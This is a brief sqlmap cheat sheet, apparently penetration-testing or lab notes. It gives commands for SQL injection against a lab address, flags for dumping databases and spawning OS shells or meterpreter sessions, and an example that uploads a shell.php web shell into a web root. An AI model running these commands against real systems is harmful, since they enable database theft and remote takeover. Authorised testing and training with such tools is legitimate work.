# SQLmap

# Usage

# Default
sqlmap -u http://10.10.10.150/index.php?id=1

# Using a request file (Burp)
sqlmap -r file.req

# Syntax

Argument	Description
--dbs	Discover database
--dump	Dump database
--tables	Find tables
--force-ssl	If using 443 https
--delay=1	Adds delay in the requests
-D	Select database
-T	Select table
-C	Select Column
--batch	Dont prompt - Run as default
--os-shell	Interactive shell
--os-pwn	OOB shell, meterpreter

# Examples

# When you know the database
sqlmap -r portal.req --dbms=mysql --dump

# Upload a file
sqlmap -r login.req --file-write=/home/kali/shell.php --file-dest=C:/inetpub/wwwroot/shell.php